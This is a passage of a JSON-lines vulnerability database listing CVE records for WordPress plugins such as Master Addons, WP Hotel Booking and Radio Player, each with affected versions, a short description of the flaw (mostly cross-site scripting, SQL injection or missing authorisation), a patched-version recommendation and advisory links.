{"CVE_ID":"CVE-2024-2303","slug":"easy-textillate","versionImpact":"2.01","versionEndExcluding":"2.02","description":"The Easy Textillate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'textillate' shortcode in all versions up to, and including, 2.01 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.02, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/66529116-7b0e-4e2f-96f1-a4d91fa7f956?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3050231%40easy-textillate&new=3050231%40easy-textillate&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7165","slug":"backup","versionEndExcluding":"2.0.9.9","description":"The JetBackup WordPress plugin before 2.0.9.9 doesn't use index files to prevent public directory listing of sensitive directories in certain configurations, which allows malicious actors to leak backup files.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ad1ef4c5-60c1-4729-81dd-f626aa0ce3fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8874","slug":"master-addons","versionImpact":"2.0.9.0","versionEndExcluding":"2.0.9.1","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several widgets in all versions up to, and including, 2.0.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.9.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/vendor\\\/fancybox\\\/jquery.fancybox.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/vendor\\\/fancybox\\\/jquery.fancybox.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338452%40master-addons&new=3338452%40master-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3338452%40master-addons&new=3338452%40master-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340128%40master-addons&new=3340128%40master-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3340128%40master-addons&new=3340128%40master-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/master-addons\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/log\\\/master-addons\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4fb1b-eed4-4ef9-9856-7c5095117aa7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4fb1b-eed4-4ef9-9856-7c5095117aa7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5799","slug":"wp-hotel-booking","versionImpact":"2.0.8","versionEndExcluding":"2.0.9","description":"The WP Hotel Booking WordPress plugin before 2.0.8 does not have proper authorisation when deleting a package, allowing Contributor and above roles to delete posts that do no belong to them","recommendation":"Update to version 2.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3061f85e-a70e-49e5-bccf-ae9240f51178\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3061f85e-a70e-49e5-bccf-ae9240f51178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2732","slug":"themify-shortcodes","versionImpact":"2.0.8","versionEndExcluding":"2.0.9","description":"The Themify Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themify_post_slider shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.9, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0aeb63e7-a24d-4d76-a8c7-f082dad87a55?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056453\\\/themify-shortcodes\\\/trunk\\\/includes\\\/themify-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3056453\\\/themify-shortcodes\\\/trunk\\\/includes\\\/themify-shortcodes.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0487","slug":"mystickyelements","versionEndExcluding":"2.0.9","description":"The My Sticky Elements WordPress plugin before 2.0.9 does not properly sanitise and escape a parameter before using it in a SQL statement when deleting messages, leading to a SQL injection exploitable by high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e874a1d-c866-45fa-b456-c8012dca32af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0e874a1d-c866-45fa-b456-c8012dca32af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1624","slug":"insert-headers-and-footers","versionEndExcluding":"2.0.9","description":"The WPCode WordPress plugin before 2.0.9 has a flawed CSRF when deleting log, and does not ensure that the file to be deleted is inside the expected folder. This could allow attackers to make users with the wpcode_activate_snippets capability delete arbitrary log files on the server, including outside of the blog folders","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b70e5-4368-43b4-81f6-2d01bc09dc8f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b70e5-4368-43b4-81f6-2d01bc09dc8f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5284","slug":"master-addons","versionImpact":"2.0.8.2","versionEndExcluding":"2.0.8.3","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom JS extension in all versions up to, and including, 2.0.8.2 due to insufficient capability restriction, and insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/inc\\\/modules\\\/custom-js\\\/custom-js.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/inc\\\/modules\\\/custom-js\\\/custom-js.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325322\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3325322\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1982bd-3ea8-48cd-8b89-39910567525c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e1982bd-3ea8-48cd-8b89-39910567525c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11368","slug":"splash-connector","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Splash Sync plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splash-connector\\\/tags\\\/2.0.6\\\/includes\\\/class-splash-wordpress-settings.php#L259\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/splash-connector\\\/tags\\\/2.0.6\\\/includes\\\/class-splash-wordpress-settings.php#L259\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5be1cfcf-26f1-47d8-a48c-d9f385eb031a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4787","slug":"themify-shortcodes","versionEndExcluding":"2.0.8","description":"Themify Shortcodes WordPress plugin before 2.0.8 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ab59972-ccfd-48f6-b879-58fb38823ca5\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ab59972-ccfd-48f6-b879-58fb38823ca5\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3588","slug":"getwid","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Getwid \u2013 Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown block in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4770184-1b96-490c-b506-f648ab3ed764?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4770184-1b96-490c-b506-f648ab3ed764?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/assets\\\/blocks\\\/counter\\\/frontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/getwid\\\/trunk\\\/assets\\\/blocks\\\/counter\\\/frontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/motopress\\\/getwid\\\/pull\\\/123\\\/files#diff-042442d51783880aea585ad052aae32346491ed600f83b950955084a96a6e030\",\"name\":\"https:\\\/\\\/github.com\\\/motopress\\\/getwid\\\/pull\\\/123\\\/files#diff-042442d51783880aea585ad052aae32346491ed600f83b950955084a96a6e030\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077603%40getwid&new=3077603%40getwid&sfp_email=&sfph_mail=#file7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077603%40getwid&new=3077603%40getwid&sfp_email=&sfph_mail=#file7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4632","slug":"cartflows","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The WooCommerce Checkout & Funnel Builder by CartFlows \u2013 Create High Converting Stores For WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_upload_mimes\u2019 function in versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a89613-cfd9-4a96-b8eb-4b17376be433?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e9a89613-cfd9-4a96-b8eb-4b17376be433?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cartflows\\\/tags\\\/2.0.7\\\/classes\\\/importer\\\/batch-process\\\/class-cartflows-batch-process.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cartflows\\\/tags\\\/2.0.7\\\/classes\\\/importer\\\/batch-process\\\/class-cartflows-batch-process.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087760\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087760\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13466","slug":"automatically-hierarchic-categories-in-menu","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Automatically Hierarchic Categories in Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'autocategorymenu' shortcode in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatically-hierarchic-categories-in-menu\\\/trunk\\\/includes\\\/class-auto-hierarchic-category-menu.php#L312\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/automatically-hierarchic-categories-in-menu\\\/trunk\\\/includes\\\/class-auto-hierarchic-category-menu.php#L312\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3229318%40automatically-hierarchic-categories-in-menu&new=3229318%40automatically-hierarchic-categories-in-menu&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3229318%40automatically-hierarchic-categories-in-menu&new=3229318%40automatically-hierarchic-categories-in-menu&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatically-hierarchic-categories-in-menu\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatically-hierarchic-categories-in-menu\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad01d01a-d1d9-4c4e-9818-52298c2df89c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ad01d01a-d1d9-4c4e-9818-52298c2df89c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3812","slug":"salient-core","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Salient Core plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.7 via the 'nectar_icon' shortcode 'icon_linea' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd3b70e-a06a-4dcc-a6af-dbe64fd57c82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ebd3b70e-a06a-4dcc-a6af-dbe64fd57c82?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0151","slug":"utubevideo-gallery","versionEndExcluding":"2.0.8","description":"The uTubeVideo Gallery WordPress plugin before 2.0.8 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9fc6f5f-efc1-4e23-899b-e9a49330ed13\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d9fc6f5f-efc1-4e23-899b-e9a49330ed13\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5652","slug":"wp-hotel-booking","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The WP Hotel Booking WordPress plugin before 2.0.8 does not have authorisation and CSRF checks, as well as does not escape user input before using it in a SQL statement of a function hooked to admin_init, allowing unauthenticated users to perform SQL injections","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ea46b9a-5239-476b-949d-49546371eac1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8ea46b9a-5239-476b-949d-49546371eac1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5651","slug":"wp-hotel-booking","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The WP Hotel Booking WordPress plugin before 2.0.8 does not have authorisation and CSRF checks, as well as does not ensure that the package to be deleted is a package, allowing any authenticated users, such as subscriber to delete arbitrary posts","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a365c050-96ae-4266-aa87-850ee259ee2c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a365c050-96ae-4266-aa87-850ee259ee2c\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11200","slug":"goodlayers-core","versionImpact":"2.0.7","versionEndExcluding":"2.0.8","description":"The Goodlayers Core plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018font-family\u2019 parameter in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/goodlayers.com\\\/\",\"name\":\"https:\\\/\\\/goodlayers.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1baa3f0-28ec-409f-a9a5-c35545ab439a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e1baa3f0-28ec-409f-a9a5-c35545ab439a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4548","slug":"imageseo","versionEndExcluding":"2.0.8","description":"The Optimize images ALT Text & names for SEO using AI WordPress plugin before 2.0.8 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ff435bc-ea20-4993-98ae-1f61b1732b59\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ff435bc-ea20-4993-98ae-1f61b1732b59\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4027","slug":"radio-player","versionImpact":"2.0.73","versionEndExcluding":"2.0.74","description":"The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_settings function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to update plugin settings.","recommendation":"Update to version 2.0.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc9f75d-f1a6-486b-b924-76ec618c5314?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2cc9f75d-f1a6-486b-b924-76ec618c5314?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050056\\\/radio-player\\\/tags\\\/2.0.74\\\/includes\\\/class-ajax.php?old=2986565&old_path=radio-player%2Ftags%2F2.0.73%2Fincludes%2Fclass-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3050056\\\/radio-player\\\/tags\\\/2.0.74\\\/includes\\\/class-ajax.php?old=2986565&old_path=radio-player%2Ftags%2F2.0.73%2Fincludes%2Fclass-ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4025","slug":"radio-player","versionImpact":"2.0.73","versionEndExcluding":"2.0.74","description":"The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the update_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to update player instances.","recommendation":"Update to version 2.0.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77409977-6822-4d14-9842-cb6a5aff2162?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77409977-6822-4d14-9842-cb6a5aff2162?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4024","slug":"radio-player","versionImpact":"2.0.73","versionEndExcluding":"2.0.74","description":"The Radio Player plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the delete_player function in versions up to, and including, 2.0.73. This makes it possible for unauthenticated attackers to delete player instances.","recommendation":"Update to version 2.0.74, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f408f1f-207e-427a-a5d0-d0fadf453d7e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3f408f1f-207e-427a-a5d0-d0fadf453d7e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/radio-player\\\/tags\\\/2.0.7\\\/readme.txt\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2942906\\\/radio-player\\\/trunk\\\/includes\\\/class-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3048105\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9618","slug":"master-addons","versionImpact":"2.0.7.2","versionEndExcluding":"2.0.7.3","description":"The Master Addons \u2013 Elementor Addons with White Label, Free Widgets, Hover Effects, Conditions, & Animations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 2.0.7.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"name\":\"https:\\\/\\\/master-addons.com\\\/changelogs\\\/\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1030\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1030\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1993\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L1993\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L510\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L510\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L535\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/master-addons\\\/trunk\\\/assets\\\/js\\\/master-addons-scripts.js#L535\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243199\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249130\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3249130\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/master-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b8d399f3-5517-4c5d-b792-94eb8b0cc0f4?source=cve\",\"